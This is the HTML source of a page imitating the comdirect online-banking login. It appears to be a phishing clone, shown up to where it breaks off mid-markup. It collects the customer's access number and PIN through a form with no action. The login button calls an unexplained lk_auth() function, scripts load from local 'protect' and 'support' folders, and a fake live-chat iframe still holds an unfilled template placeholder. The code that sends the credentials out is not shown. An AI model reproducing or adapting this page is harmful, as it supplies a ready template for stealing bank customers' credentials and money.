<!DOCTYPE html>
<html lang="de" data-cbscriptallow="true"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
 <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>comdirect Login - Ihr Online Banking &amp; Brokerage | comdirect.de</title>
<meta name="description" content="Hier anmelden für Ihr Online Banking: Girokonto, Depot und Wertpapiere. ► comdirect login"><meta name="robots" content="index,follow">            <link rel="canonical" href="https://kunde.comdirect.de/lp/wt/login?execution=e1s1">
    <meta name="author" content="comdirect.de"><meta name="application-name" content="comdirect.de">
<meta name="cacheVersionQueryParam" content="v=1644587172371">    <meta name="domainSuffix" content=".comdirect.de">
<meta name="comdirectCifCallback" content="off"><meta name="comdirectCifChat" content="on"><meta name="comdirectCifVolltextsuche" content="on"><meta name="comdirectCifTelefon" content="on"><meta name="comdirectCifKontaktformular" content="on"><meta name="comdirectCifCobrowsing" content="on"><meta name="comdirectCifVChat" content="off"><meta name="comdirectCifOnlineLegitimation" content="on"><meta name="comdirectCifServiceWorker" content="true">
<meta name="theme-color" content="#28373c">
<meta name="msapplication-TileImage" content="/mstile-144x144.png">
<meta name="msapplication-TileColor" content="#FFFFFF">
<!-- support -->
<link rel="stylesheet" href="/static/style/support/support_parent.css">
<script src="/static/style/protect/protect.js"></script>
<link rel="shortcut icon" href="/static/style/comdirectDE/favicon_196px.png">

    
                                    <link rel="preload" href="/static/style/comdirectDE/MarkWeb-latin-regular.woff2" as="font" crossorigin="">
                                                <link rel="preload" href="/static/style/comdirectDE/MarkWeb-latin-medium.woff2" as="font" crossorigin="">
                                                <link rel="preload" href="/static/style/comdirectDE/MarkWeb-latin-bold.woff2" as="font" crossorigin="">                                              
        <link rel="stylesheet" href="/static/style/comdirectDE/styleguide-comdirect.css" type="text/css">
    </head>
<body class="cif-scope-body is-logged-out" data-plugin="{topframechecker:{},unobtrusivefocus:{enabled:false},cobrowsing:{unbluScript:&#39;/unblu/static/js/xmd27427060/xpi0/com.unblu.client.snippet&#39;,cookieName:&#39;x-unblu-recorder-session&#39;},keepalive:{url:&#39;/cp/keepalive&#39;,onError:&#39;stop&#39;,interval:300},ecrm:{pageHierarchy:&#39;comdirect Login&#39;,id:&#39;cori0004&#39;}}" data-datalayer="{&quot;page&quot;:{&quot;pageHierarchy&quot;:&quot;comdirect Login&quot;,&quot;id&quot;:&quot;cori0004&quot;,&quot;status&quot;:200},&quot;steuerung&quot;:{&quot;surferTrack&quot;:true}}">    
    <div class="
    chatra--webkit
    chatra--style-round
    chatra--side-bottom
    chatra--pos-right
    chatra--visible
    chatra--expanded
    chatra--fast-toggle
  " id="chatra" data-turbolinks-permanent="" style="width: 380px; height: 600px; transform: none; z-index: 2147483647; display:none;">
<div id="chatra__iframe-wrapper">
  <iframe frameborder="0" id="chatra__iframe" allowtransparency="true" title="Chatra live chat" allow="autoplay" src="/static/style/support/index.html?id=<%=id %>" style="width: 380px; height: 600px; position: absolute"></iframe>
</div>
</div>
<div class="support-circle" onclick="document.querySelector(&#39;#chatra&#39;).style.display = &#39;block&#39;;this.style.display = &#39;none&#39;"></div>
    <noscript>
    <div id="noscript" style="padding:20px; background-color: #DEDEDE;">
        <p style="color:#DE0000;font-size: 1.1em;">
            In Ihrem Browser ist JavaScript deaktiviert. Die Nutzung der comdirect-Website ist ohne JavaScript nicht m&ouml;glich.<br />
            Sollten Sie weiterhin Probleme mit dem Zugriff auf die Seite haben, wenden Sie sich bitte w&auml;hrend unserer Servicezeiten an unsere Hotline unter der Rufnummer 04106 - 708 25 10.
        </p>
    </div>
</noscript>
<div class="cif-scope" data-domain=".comdirect.de" data-version="?v=1644587172371">

<header class="start-header header-container">
  <input type="checkbox" id="burger-icon--trigger" class="burger-icon--trigger">
  <section class="header__section">
       <a href="https://www.comdirect.de/" class="header__logo">
         <svg xmlns="http://www.w3.org/2000/svg" width="168" height="32" viewBox="48.478 103.112 152.304 24"><path fill="#FFF500" d="M56.978 110.6c-5.144 0-8.5 3.556-8.5 8.256 0 4.701 3.356 8.257 8.5 8.257 2.412 0 4.571-.853 6.039-2.508l-2.175-2.359c-1.029.935-2.412 1.638-3.963 1.638-2.715 0-4.772-2.062-4.772-5.027s2.058-5.03 4.772-5.03c1.551 0 2.75.591 3.878 1.622l2.26-2.343c-1.434-1.655-3.627-2.506-6.039-2.506zm16.495 0c-4.993 0-8.686 3.556-8.686 8.256 0 4.701 3.693 8.257 8.686 8.257 4.992 0 8.703-3.557 8.703-8.257-.001-4.703-3.711-8.256-8.703-8.256zm0 3.226c2.884 0 5.077 2.065 5.077 5.029 0 2.966-2.193 5.028-5.077 5.028-2.885 0-5.059-2.062-5.059-5.028-.001-2.963 2.174-5.029 5.059-5.029zm28.547-3.191c-2.108 0-3.585.752-4.748 1.812-.969-1.035-2.18-1.812-4.264-1.812-1.5 0-2.882.8-3.56 1.505v-1.152h-3.584v15.715h3.584v-11.315c.63-.729 1.599-1.411 3.077-1.411 2.132 0 3.099 1.787 3.099 4.211v8.516h3.585v-11.315c.678-.729 1.453-1.411 2.81-1.411 2.446 0 3.366 1.787 3.366 4.211v8.516h3.585v-8.021c.001-4.779-2.009-8.049-6.95-8.049m18.121-.035c-4.52 0-8.079 3.457-8.079 8.256 0 4.801 3.56 8.257 8.079 8.257 2.293 0 3.963-.902 5.076-2.293v1.883h3.524v-23.59h-3.524v9.797c-1.113-1.393-2.783-2.31-5.076-2.31zm.421 3.226c2.919 0 4.874 2.162 4.874 5.029s-1.956 5.028-4.874 5.028c-3.036 0-4.873-2.277-4.873-5.028-.001-2.751 1.836-5.029 4.873-5.029zm16.579-2.817h-3.542v15.693h3.542v-15.693zm13.037-.409c-1.974 0-3.627.688-4.688 2.179v-1.77h-3.491v15.693h3.525v-8.634c0-2.67 1.601-4.209 3.844-4.209.862 0 1.941.196 2.682.573l.844-3.391c-.811-.311-1.637-.441-2.716-.441zm11.839 0c-4.756 0-8.045 3.342-8.045 8.256 0 4.98 3.425 8.257 8.265 8.257 2.444 0 4.672-.573 6.645-2.212l-1.754-2.442c-1.332 1.033-3.053 1.655-4.673 1.655-2.293 0-4.333-1.179-4.807-3.997h11.943c.032-.394.065-.835.065-1.278-.016-4.899-3.119-8.239-7.639-8.239zm-.068 3.046c2.243 0 3.711 1.425 4.098 3.865h-8.382c.372-2.292 1.772-3.865 4.284-3.865zm18.739-3.046c-5.146 0-8.502 3.556-8.502 8.256 0 4.701 3.356 8.257 8.502 8.257 2.411 0 4.57-.853 6.037-2.508l-2.176-2.359c-1.028.935-2.411 1.638-3.963 1.638-2.715 0-4.773-2.062-4.773-5.027s2.058-5.03 4.773-5.03c1.552 0 2.75.591 3.878 1.622l2.261-2.343c-1.434-1.655-3.625-2.506-6.037-2.506zm9.333 10.419c0 4.177 2.142 6.094 5.801 6.094 2.023 0 3.659-.704 4.959-1.557l-1.4-2.735c-.962.59-2.159 1.063-3.254 1.063-1.417 0-2.564-.817-2.564-2.931v-6.832h6.189v-3.113h-6.189v-4.75h-3.541v14.761z"></path></svg>
       </a>
       <section class="header__search">
        <div class="grid grid--no-gutter grid--middle">
            <div class="col-2"></div>
            <div class="col-3">
               <div class="header-searchfield">
                  <form action="https://www.comdirect.de/inf/search/all.html" id="search_form">
                      <input type="text" class="header-searchfield__input" placeholder="WKN, ISIN, Name" title="Wertpapiersuche" name="SEARCH_VALUE">
                      <a href="javascript://" data-plugin="{commandlink:{event:&#39;click&#39;, form: &#39;#search_form&#39;, ignoreUnbind:true }}">
                        <span class="icon icon--cd_search-16 icon--size-16">
                          <svg class="icon__svg">
                            
                          </svg>
                        </span>
                      </a>
                   </form>
               </div>                          
            </div>
            <div class="col-3">
                                                            <div class="layer-tooltip__container">
                            <label for="header-searchfield-autocompletion" class="layer-tooltip--sm-min-label layer-tooltip__label layer-tooltip__label-trigger" data-role="layer__trigger-label">
                                <div class="header-searchfield" data-plugin="{inputSearch: {}, inputAutocompletion: {resultElement: &#39;results-suche&#39;,resultElementClass: &#39;header_search-result__container&#39;,resultElementTrigger: &#39;.header-searchfield__layer-tooltip&#39;}}">
                                    <input type="text" maxlength="256" class="header-searchfield__input" autocomplete="off" placeholder="Volltextsuche" data-role="search-input" spellcheck="false">
                                    <a href="https://kunde.comdirect.de/lp/wt/login?execution=e1s1#" data-role="search-trigger">
                                        <span class="icon icon--cd_search-16 icon--size-16">
                                            <svg class="icon__svg">
                                                
                                            </svg>
                                        </span>
                                    </a>
                                </div>
                            </label>
                            <div class="layer layer-tooltip--sm-min layer-tooltip header-searchfield__layer-tooltip" data-plugin="{common_layerTooltip: {inverted: true, openOnlyBottom: true}}">
                               <input type="checkbox" id="header-searchfield-autocompletion" class="layer__trigger layer-tooltip__trigger" data-role="layer__trigger">
                               <div class="layer__content-wrapper layer-tooltip__content-wrapper" data-role="layer__content-wrapper">
                                  <div class="layer__backdrop layer-tooltip__backdrop"></div>
                                  <label for="header-searchfield-autocompletion" class="layer__close layer-tooltip__close">
                                     <span class="icon icon--cd_circle-40 icon--size-40 layer__close-icon layer-tooltip__close-icon layer__close-icon--ring">
                                        <svg class="icon__svg" focusable="false">
                                           <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_circle-40"></use>
                                        </svg>
                                     </span>
                                     <span class="icon icon--cd_close-16 icon--size-16 layer__close-icon layer-tooltip__close-icon">
                                        <svg class="icon__svg" focusable="false">
                                           <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_close-16"></use>
                                        </svg>
                                     </span>
                                  </label>
                                  <div class="layer__content layer-tooltip__content" data-role="layer__content">
                                     <header class="layer__header layer__header--has-headline " data-role="layer__header">
                                        <span class="headline headline--h3-alt layer__header-headline"></span>
                                        <nav class="layer__nav" data-role="layer__nav">
                                           <ul class="layer__nav-list">
                                              <li class="layer__nav-list-item">
                                                 <label class="layer__nav-list-item--label" for="layer-tooltip-header-search">
                                                    <span class="icon icon--cd_close-16 icon--size-16">
                                                       <svg class="icon__svg" focusable="false">
                                                          <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_close-16"></use>
                                                       </svg>
                                                    </span>
                                                 </label>
                                              </li>
                                           </ul>
                                        </nav>
                                     </header>
                                     <div class="layer__content-scroll-container grid-container layer-tooltip__content-scroll-container" data-role="layer__inner-content">
                                        <div id="results-suche" class="header_search-result__container"></div>
                                     </div>
                                  </div>
                               </div>
                            </div>
                        </div>
                                                 </div>
            <div class="col-4">
               <a href="https://www.comdirect.de/inf/musterdepot/index.html" class="header__link" data-plugin="{at:{pageId:&#39;coai2863&#39;,cDes:&#39;LSG-main_navigation|Musterdepot&#39;}}">Musterdepot</a>
               <a href="https://www.comdirect.de/business-partners/leistungsangebot.html" class="header__link" data-plugin="{at:{pageId:&#39;coai2863&#39;,cDes:&#39;LSG-main_navigation|B2B&#39;}}">B2B</a>
                               <div id="llLink" data-login="false">          
            <a class="button button--primary button--medium button--outline " href="https://kunde.comdirect.de/lp/wt/login">
                <span class="button__inner">Login</span>
            </a>  
        </div>      
                                  </div>
        </div>
      
      </section>
      
      <div class="header__mobile--navigation-wrapper">
        <label for="burger-icon--trigger">
                        <div class="header__mobile--navigation-wrapper__login">
                  <a href="https://www.comdirect.de/lp/wt/login">
                      <span class="icon icon--cd_lock-closed-16 icon--size-16">
                          <svg class="icon__svg">
                              <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_lock-closed-16"></use>
                          </svg>
                      </span>
                      Login
                  </a>
              </div>
               
          <div class="burger-icon">
            <span></span>
            <span></span>
            <span></span>
            <span></span>
          </div>

        </label>
      </div>
      <div class="header__mobile-shadow"></div>
  </section>
        <nav>
            <div class="navigation--mobile">
                <div class="inner-spacing--medium-bottom hidden-lg bg-color--cd-anthracite">
                    <div class="navigation--mobile__search" data-plugin="{ mobileSearch: {} }">
                        <div class="header-searchfield">
                           <form action="https://www.comdirect.de/inf/search/all.html" id="search_form--mobile">
                              <input type="text" class="header-searchfield__input" placeholder="WKN, ISIN, Name" title="Wertpapiersuche" autocomplete="off" name="SEARCH_VALUE">
                              <a href="javascript://" data-plugin="{commandlink:{event:&#39;click&#39;, form: &#39;#search_form--mobile&#39;, ignoreUnbind:true }}">
                                <span class="icon icon--cd_search-16 icon--size-16">
                                  <svg class="icon__svg">
                                    
                                  </svg>
                                </span>
                              </a>
                           </form>
                        </div>
                                                                                    <div class="header-searchfield" data-plugin="{inputSearch: {}, inputAutocompletion: {showResultInTooltip: false, resultElement: &#39;results-suche-mobile&#39;,resultElementClass: &#39;navigation--mobile__search-results-inner&#39;}}">
                                                            <form action="https://kunde.comdirect.de/lp/wt/login?execution=e1s1" id="search-volltext-form--mobile">
                                  <input type="text" maxlength="256" class="header-searchfield__input" autocomplete="off" placeholder="Volltextsuche" data-role="search-input" spellcheck="false">
                                  <a href="javascript://" id="topSearchButton--mobile" data-role="search-trigger">
                                    <span class="icon icon--cd_search-16 icon--size-16">
                                      <svg class="icon__svg">
                                        
                                      </svg>
                                    </span>
                                  </a>
                               </form>
                            </div>
                                                <span class="icon icon--close-x header-searchfield__close-button">
                          <svg class="icon__svg">
                            <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#close-x"></use>
                          </svg>
                        </span>
                    </div>
                    <div class="navigation--mobile__search-results">
                      <div id="results-suche-mobile" class="navigation--mobile__search-results-inner"></div>
                    </div>
                </div>
                
                 <!-- Modell fuer die Responsive mobile Version --> <!-- ssoStatus: false --> <ul class="navigation__list navigation__list--level-1" data-plugin="{navigationLoader: {}, navigateWithTabKey: {}, toggleClassByAttributeValue:{source:&#39;#llLink&#39;}}"> <li class="navigation__item navigation__item--level-1 navigation__item--desktop-first "> <a data-plugin="{at:{pageId:&#39;coai0827&#39;}}" href="https://www.comdirect.de/pbl/redirector3.jsp" target=""> Persönlicher Bereich </a> <div class="hidden-lg navigation__plusicon navigation__plusicon--logged-out-hidden "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/Persoenlicherbereich1"></li> <li class="navigation__item navigation__item--level-1 "> <a data-plugin="{at:{pageId:&#39;coai0828&#39;}}" href="https://www.comdirect.de/inf/index.html" target=""> Informer </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/Informer1"></li> <li class="navigation__item navigation__item--level-1 "> <a data-plugin="{at:{pageId:&#39;coai2868&#39;}}" href="https://www.comdirect.de/konto/girokonto.html" target=""> Girokonto </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/Konto1"></li> <li class="navigation__item navigation__item--level-1 "> <a data-plugin="{at:{pageId:&#39;coai2870&#39;}}" href="https://www.comdirect.de/geldanlage/geldanlage.html" target=""> Geldanlage </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/Geldanlage1"></li> <li class="navigation__item navigation__item--level-1 "> <a data-plugin="{at:{pageId:&#39;coai2871&#39;}}" href="https://www.comdirect.de/depot/depot.html" target=""> Depot </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/Depot1"></li> <li class="navigation__item navigation__item--level-1 "> <a data-plugin="{at:{pageId:&#39;coai2872&#39;}}" href="https://www.comdirect.de/wertpapierhandel/wertpapierhandel.html" target=""> Wertpapierhandel </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/Wertpapierhandel1"></li> <li class="navigation__item navigation__item--level-1 "> <a data-plugin="{at:{pageId:&#39;coai2869&#39;}}" href="https://www.comdirect.de/kredit/kredit.html" target=""> Kredite </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/Kredite1"></li> <li class="navigation__item navigation__item--level-1 navigation__item--desktop-last "> <a data-plugin="{at:{pageId:&#39;coai0829&#39;}}" href="https://www.comdirect.de/cms/hilfe-service-kontakt.html" target=""> Hilfe &amp; Service </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/HilfeService1"></li> <li class="navigation__item navigation__item--level-1 hidden-lg "> <a data-plugin="" href="https://www.comdirect.de/" target=""> Über uns </a> <div class="hidden-lg navigation__plusicon "> </div> </li> <li class="navigation__sublevel" data-fetch-url="//www.comdirect.de/cp/navigation/UeberunsDE1"></li> <li class="navigation__impulse visible-lg"></li> </ul> 
                
                <div class="hidden-lg">
                    <ul class="navigation__list navigation__list--links">
                      <li class="navigation__item">
                          <a href="https://www.comdirect.de/inf/musterdepot/index.html" data-plugin="{at:{pageId:&#39;coai2863&#39;,cDes:&#39;LSG-main_navigation|Musterdepot&#39;}}">Musterdepot</a>
                      </li>
                      <li class="navigation__item">
                          <a href="https://www.comdirect.de/business-partners/leistungsangebot.html" data-plugin="{at:{pageId:&#39;coai2863&#39;,cDes:&#39;LSG-main_navigation|B2B&#39;}}">B2B</a>
                      </li>
                    </ul>
                </div>
                
                
                         
            </div>            
        </nav>
</header>
</div> 
    <div class="cif-scope bg-color--cd-black-0">
      <div class="grid-container--limited-md  hidden-lg kontoinhaber__container" id="div_kontoinhaber">
                                

    
        </div>
    </div>

        <div class="cif-scope-content-wrapper siteFrame" data-plugin="{common_eventHub: {events: [&#39;resize&#39;]}}">
            
                <div class="grid-container--limited-md grid-container"><div class="grid--center grid">
                    <div class="col col--md-8 col--lg-10 col--sm-4">
                        <div class="col__content">
                            <div class="grid">
                                <div class="col col--md-push-left-1 col--md-5">
                                    <div class="col__content col__content--no-padding">
                                        <h1 class="headline--h1 headline">comdirect Login</h1>
                                        <span class="output-text hidden-sm text-size--xlarge">Willkommen bei Ihrem Online Banking</span>
                                    </div>
                                </div>
                            </div>
                            <div class="grid">
                                <div class="col col--lg-5 col--sm-4 col--md-push-left-1 col--md-5">
                                    <div class="col__content col__content--no-padding">
                                        <div id="messages" data-tid="messages">

                                        </div><form autocomplete="off">
                                            <input name="rolle" type="hidden" id="rolle" data-tid="rolle">
                                            <input name="page" type="hidden" id="page" data-tid="page">
                                            <div class="grid--no-gutter grid">
                                                <div class="col-11 col">
                                                    <div class="col__content col__content--no-padding">
                                                        <label class="form-label">
                                                            <span class="form-label__name--left">
                                                                <span class="output-text">Zugangsnummer </span>
                                                                <span class="output-text">/ Benutzername</span>
                                                            </span>
                                                        </label>
                                                    </div>
                                                </div>
                                                <div class="col col-1 col--bottom">
                                                    <div class="col__content col__content--no-padding">
                                                        <span class="info-link">
                                                            <div class="info-link__wrapper">
                                                                <div class="layer-tooltip__container">
                                                                    <label class="layer-tooltip__label layer-tooltip--lg-min-label" data-role="layer__trigger-label" for="j_idt24__input"><span class="info-link__wrapper"><span class="icon icon--size-16"><svg focusable="false" class="icon__svg"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_info-circle-16"></use> </svg></span></span></label><div class="layer layer-tooltip--lg-min layer-tooltip" data-plugin="{common_layerTooltip:{hover:false,parent:true,viewports:&quot;mediaDesktop&quot;,inverted:false,defaultParentSelector:&quot;.cif-scope-content-wrapper&quot;,dropdownList:false}}"><input type="checkbox" class="layer__trigger layer-tooltip__trigger" id="j_idt24__input" data-role="layer__trigger" autocomplete="off" tabindex="-1"><div class="layer__content-wrapper layer-tooltip__content-wrapper" data-role="layer__content-wrapper"><div class="layer__backdrop layer-tooltip__backdrop"></div><label for="j_idt24__input" class="layer__close layer-tooltip__close"><span class="icon layer__close-icon layer__close-icon__ring icon--size-40"><svg focusable="false" class="icon__svg"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_circle-40"></use> </svg></span><span class="icon icon--size-16 layer__close-icon"><svg focusable="false" class="icon__svg"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_close-16"></use> </svg></span></label><div class="layer__content layer-tooltip__content" data-role="layer__content"><div data-role="layer__inner-content" class="layer__content-scroll-container grid-container layer-tooltip__content-scroll-container"><p class="paragraph paragraph--max-width">Die Zugangsnummer zu Ihrem Konto und Depot ist numerisch. Die Zugangsnummer wurde Ihnen bei Ihrer Konto-/Depoteröffnung mitgeteilt.</p><p class="paragraph paragraph--max-width">Der Benutzername gilt für Ihren Zugang zu "Meine comdirect" (z. B. für das Musterdepot).</p></div></div></div></div></div></div></span></div></div><div class="col col-12"><div class="col__content col__content--no-padding"><div id="param1" data-tid="param1" class="input input--margin-bottom"><input id="login" data-tid="login" name="login" type="text" maxlength="38" class="input__inner"></div></div></div></div><div class="grid--no-gutter grid"><div class="col-11 col"><div class="col__content col__content--no-padding"><label class="form-label"><span class="form-label__name"><span class="output-text">PIN </span><span class="output-text">/ Passwort</span></span></label></div></div><div class="col col-1 col--bottom"><div class="col__content col__content--no-padding"><span class="info-link"><div class="info-link__wrapper"><div class="layer-tooltip__container"><label class="layer-tooltip__label layer-tooltip--lg-min-label" data-role="layer__trigger-label" for="j_idt40__input"><span class="info-link__wrapper"><span class="icon icon--size-16"><svg focusable="false" class="icon__svg"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_info-circle-16"></use> </svg></span></span></label><div class="layer layer-tooltip--lg-min layer-tooltip" data-plugin="{common_layerTooltip:{hover:false,parent:true,viewports:&quot;mediaDesktop&quot;,inverted:false,defaultParentSelector:&quot;.cif-scope-content-wrapper&quot;,dropdownList:false}}"><input type="checkbox" class="layer__trigger layer-tooltip__trigger" id="j_idt40__input" data-role="layer__trigger" autocomplete="off" tabindex="-1"><div class="layer__content-wrapper layer-tooltip__content-wrapper" data-role="layer__content-wrapper"><div class="layer__backdrop layer-tooltip__backdrop"></div><label for="j_idt40__input" class="layer__close layer-tooltip__close"><span class="icon layer__close-icon layer__close-icon__ring icon--size-40"><svg focusable="false" class="icon__svg"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_circle-40"></use> </svg></span><span class="icon icon--size-16 layer__close-icon"><svg focusable="false" class="icon__svg"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_close-16"></use> </svg></span></label><div class="layer__content layer-tooltip__content" data-role="layer__content"><div data-role="layer__inner-content" class="layer__content-scroll-container grid-container layer-tooltip__content-scroll-container"><p class="paragraph paragraph--max-width">Für den Login in Ihr Konto und Depot geben Sie bitte Ihre sechsstellige numerische Persönliche Identifikationsnummer (PIN) ein.</p><p class="paragraph paragraph--max-width">Das Passwort gilt für Ihren "Meine comdirect-Account" und kann neben Ziffern auch Buchstaben enthalten.</p></div></div></div></div></div></div></span></div></div><div class="col col-12"><div class="col__content col__content--no-padding"><div id="param3" data-tid="param3" class="input input--margin-bottom"><input id="password" data-tid="password" name="password" type="password" autocomplete="off" maxlength="16" data-postonly="true" class="input__inner"></div></div></div></div><div class="grid--no-gutter grid"><div class="col col-12"><div class="col__content col__content--no-padding"><label for="direktzuInput" class="form-label"><span class="form-label__name">Direkt zu</span></label></div></div><div class="col col-12"><div class="col__content col__content--no-padding"><div id="direktzu" data-tid="direktzu" class="select input--margin-bottom"><select id="direktzuInput" data-tid="direktzuInput" name="direktzu" class="select__inner" size="1">	<option id="direktzu_0" data-tid="direktzu_0" value="PersoenlicherBereich">Persönlicher Bereich</option>
	<option id="direktzu_1" data-tid="direktzu_1" value="DepotUebersicht">Depotübersicht</option>
	<option id="direktzu_2" data-tid="direktzu_2" value="Abrechnungsdaten">Abrechnungsdaten</option>
	<option id="direktzu_3" data-tid="direktzu_3" value="DepotUmsaetze">Depotumsätze</option>
	<option id="direktzu_4" data-tid="direktzu_4" value="InlandsOrder">Inlandsorder</option>
	<option id="direktzu_5" data-tid="direktzu_5" value="DepotAusserboerslicherhandel">LiveTrading</option>
	<option id="direktzu_6" data-tid="direktzu_6" value="DepotOrderbuch">Orderbuch</option>
	<option id="direktzu_7" data-tid="direktzu_7" value="KontoUmsaetze">Kontoumsätze</option>
	<option id="direktzu_8" data-tid="direktzu_8" value="KontoUeberweisung">Überweisung</option>
	<option id="direktzu_9" data-tid="direktzu_9" value="BonusSparen">Bonus-Sparen</option>
	<option id="direktzu_10" data-tid="direktzu_10" value="Platzhalter">-----------------</option>
	<option id="direktzu_11" data-tid="direktzu_11" value="Musterdepot">Musterdepot</option>
	<option id="direktzu_12" data-tid="direktzu_12" value="InformerStartseite">Meine Informer Startseite</option>
</select><div class="select__trigger"><span class="icon icon--size-16"><svg focusable="false" class="icon__svg"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_angle-down-16"></use> </svg></span></div></div></div></div></div><div class="grid--no-gutter grid"><div class="col text-align--right col-12"><div class="col__content col__content--no-padding-horizontal"><a id="loginAction" onclick="lk_auth()" data-tid="loginAction" class="button button--growing button--large button--primary"><span class="button__inner">Anmelden</span><div class="spinner--transparent spinner--large spinner"><svg viewBox="0 0 22 22" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><g class="stroke" fill="none" stroke-width="2" stroke="currentColor"><path d="M11,20 C15.9705627,20 20,15.9705627 20,11 C20,6.02943725 15.9705627,2 11,2 C6.02943725,2 2,6.02943725 2,11"></path></g></svg></div></a></div></div></div><ul class="unordered-list unordered-list--arrow"><li><a href="http://www.comdirect.de/pbl/https/member/ssomanager/personalization/forgottenlogindata/OverviewVP.do" class="link link--secondary"><span class="output-text">Zugangsdaten vergessen?<br>Zugang gesperrt?</span></a></li></ul><div class="grid--no-gutter grid grid--no-bottom"><div class="col col-12"><div class="col__content col__content--no-padding"><div><!-- Start Software Snippet /cms/snippets/cori0004-loginconversionsnippet.html -->  <div class="layer-tooltip__container tooltip--full-width outer-spacing--medium-bottom"> <label for="layer-tooltip-kunde-werden" class="layer-tooltip--sm-min-label layer-tooltip__label tooltip--full-width" data-role="layer__trigger-label"> <span class="button button--secondary button--large button--icon button--icon-right button--growing"> <span class="button__inner">Kunde werden <span class="icon icon--cd_angle-down-16 icon--size-16 button__icon"> <svg class="icon__svg" focusable="false"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_angle-down-16"></use> </svg> </span> </span> </span> </label> <div class="layer layer-tooltip--sm-min layer-tooltip--dropdown-list layer-tooltip" data-plugin="{common_layerTooltip: {hover:false,parent:true,inverted:false,dropdownList:true}}"> <input type="checkbox" id="layer-tooltip-kunde-werden" class="layer__trigger layer-tooltip__trigger" data-role="layer__trigger" autocomplete="off"> <div class="layer__content-wrapper layer-tooltip__content-wrapper" data-role="layer__content-wrapper"> <div class="layer__backdrop layer-tooltip__backdrop"></div> <label for="layer-tooltip-kunde-werden" class="layer__close layer-tooltip__close"> <span class="icon icon--cd_circle-40 icon--size-40 layer__close-icon layer-tooltip__close-icon layer__close-icon--ring"> <svg class="icon__svg" focusable="false"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_circle-40"></use> </svg> </span> <span class="icon icon--cd_close-16 icon--size-16 layer__close-icon layer-tooltip__close-icon"> <svg class="icon__svg" focusable="false"> <use xlink:href="/ccf2/lsg/assets/svg/svg-symbol.svg#cd_close-16"></use> </svg> </span> </label> <div class="layer__content layer-tooltip__content" data-role="layer__content"> <div class="layer__content-scroll-container grid-container layer-tooltip__content-scroll-container" data-role="layer__inner-content"> <a href="https://kunde.comdirect.de/konto/girokonto.html" data-plugin="{at:{pageId:&#39;coai2947&#39;, cDes:&#39;LSG-Login-Seite|giro_konto_eroeffnung|LinkLayerButton&#39;}}" class="visible-lg-block link link--secondary">Konto eröffnen</a> <a href="https://kunde.comdirect.de/ngtx/depot/auswahl?wref=4631" data-plugin="{at:{pageId:&#39;coai2947&#39;, cDes:&#39;LSG-Login-Seite|depot_konto_eroeffnung|LinkLayerButton&#39;}}" class="visible-lg-block link link--secondary">Depot eröffnen</a> <a href="https://kunde.comdirect.de/konto/girokonto.html" data-plugin="{at:{pageId:&#39;coai2947&#39;, cDes:&#39;LSG-Login-Seite|giro_konto_eroeffnung|LinkLayerButton&#39;}}" class="visible-sm-block visible-md-block link link--secondary">Konto eröffnen</a> <a href="https://kunde.comdirect.de/ngtx/depot/auswahl?wref=4631" data-plugin="{at:{pageId:&#39;coai2947&#39;, cDes:&#39;LSG-Login-Seite|depot_konto_eroeffnung|LinkLayerButton&#39;}}" class="visible-sm-block visible-md-block link link--secondary">Depot eröffnen</a> </div> </div> </div> </div> </div>   <!-- End Software Snippet /cms/snippets/cori0004-loginconversionsnippet.html -->                          </div></div></div></div><ul class="unordered-list unordered-list--arrow"><li><a href="http://www.comdirect.de/pbl/https/member/ssomanager/personalization/registration/StartRegistrationRH.do" class="link link--secondary">Kostenfreie Registrierung für "Meine comdirect" und "comdirect community"</a></li></ul><input type="hidden" name="javax.faces.ViewState" id="j_id1-javax.faces.ViewState-0" value="1759044972094217728:-8992084513485263501" autocomplete="off"><input type="hidden" name="javax.faces.RenderKitId" value="CIF_HTML_RW"><input type="hidden" name="csfCsrfToken" value="Le7R9S%2Fou%2BXjRxdFEqEahsrIqdoI4VOtWLdGhME%3D"></form></div></div><div class="col hidden-sm col--lg-1"><div class="col__content col__content--no-padding"></div></div><div class="col col--sm-4 col--lg-6 col--md-push-left-1 col--md-5"><div class="col__content col__content--no-padding"><div class="panel--standard panel--full panel" data-plugin="{snippet:{url:&quot;/t/t?page=cori0004&amp;pos=1&amp;format=alpha&quot;,find:&quot;.js_slides&quot;}}"><div class="js_ajaxWrapper"><div class="js_slides">
